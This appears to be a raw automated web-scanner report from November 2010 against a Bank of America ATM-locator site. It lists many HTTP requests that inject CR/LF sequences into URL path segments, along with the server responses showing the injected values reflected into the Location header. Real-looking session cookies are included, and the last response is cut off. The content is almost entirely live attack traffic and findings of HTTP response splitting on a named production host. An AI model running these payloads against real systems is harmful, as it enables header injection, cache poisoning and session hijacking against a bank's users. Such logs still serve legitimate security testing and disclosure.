GET /locator/locator/jsp/85c0d%0d%0ac791951d1f5 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:23 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=25503F4F557FF0060E77942082D41FCC.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/jsp/85c0d c791951d1f5?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 6631d%0d%0a2319e04c3bb was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/jsp/content/6631d%0d%0a2319e04c3bb HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:03 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=5AEEED85C609BEF571918DE3D447B365.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/jsp/content/6631d 2319e04c3bb?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload aa6cb%0d%0aa9aedf3b295 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/aa6cb%0d%0aa9aedf3b295/keepAlive.jsp HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:27 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=3024EC13466CBC18692E6CC31B23B784.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/aa6cb a9aedf3b295/keepAlive.jsp?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload a8472%0d%0a75f4a76b5bc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/jsp/a8472%0d%0a75f4a76b5bc HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:25 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=E7BB65AE3CA0E01AE27EE85D5BFEAF92.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/jsp/a8472 75f4a76b5bc?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 98645%0d%0a403c76a2c28 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/onlineopinionOO4S/98645%0d%0a403c76a2c28 HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:40:19 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=C5721AED59B75A1DD5238CEDA2CC8CA8.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/98645 403c76a2c28?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 95557%0d%0a3178939fc60 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/onlineopinionOO4S/95557%0d%0a3178939fc60 HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:39:41 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=4D6C4A9EFC23F697D324B5F8F09EEBA8.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/95557 3178939fc60?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 8af48%0d%0ac3e8c6ce9bb was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/8af48%0d%0ac3e8c6ce9bb HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:37:19 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=10DB4B44D1F0592BD6ADE790679A86A1.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/8af48 c3e8c6ce9bb?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 5c677%0d%0ae0761f9e7b8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/5c677%0d%0ae0761f9e7b8/StartANewSearch_js.jsp HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:08 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=09F542CA9A4B1E3FE3854654F037E707.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/5c677 e0761f9e7b8/StartANewSearch_js.jsp?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 1579f%0d%0aa624c7959c9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/1579f%0d%0aa624c7959c9 HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:09 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=1EFEA027EC0B8B793FD8367352D028A7.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/1579f a624c7959c9?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 8b486%0d%0a5d214d10fcc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/8b486%0d%0a5d214d10fcc/footprintMapAndBalloon_js.jsp HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:32 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=90F967A8F26BA4F6822AE77EDB916C71.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/8b486 5d214d10fcc/footprintMapAndBalloon_js.jsp?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 72253%0d%0af730c9bee98 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/72253%0d%0af730c9bee98 HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:42:58 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=F3437831DC246FE84DB7CADBE86A585A.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/72253 f730c9bee98?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload c66c9%0d%0aa64ff329ad9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/c66c9%0d%0aa64ff329ad9 HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:15 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=909C861328C30AE8E74CDF442E03D923.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/c66c9 a64ff329ad9?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 9aacb%0d%0a63a27ac06ce was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/9aacb%0d%0a63a27ac06ce HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:40:16 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=635112011CBD8FE0FE0FC4089BDE4118.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/9aacb 63a27ac06ce?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 3e35b%0d%0a0d72e805f03 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/3e35b%0d%0a0d72e805f03 HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:39:39 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=A1862B3ABDA3F19BBFAE2CF99244B1A8.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/3e35b 0d72e805f03?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 3902f%0d%0ab1778f9947c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/3902f%0d%0ab1778f9947c HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:37:25 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=DD53E21EA7C4B320F593AA7FF4E72AB3.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/3902f b1778f9947c?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 8aa0a%0d%0ad97d3fd8580 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/8aa0a%0d%0ad97d3fd8580 HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
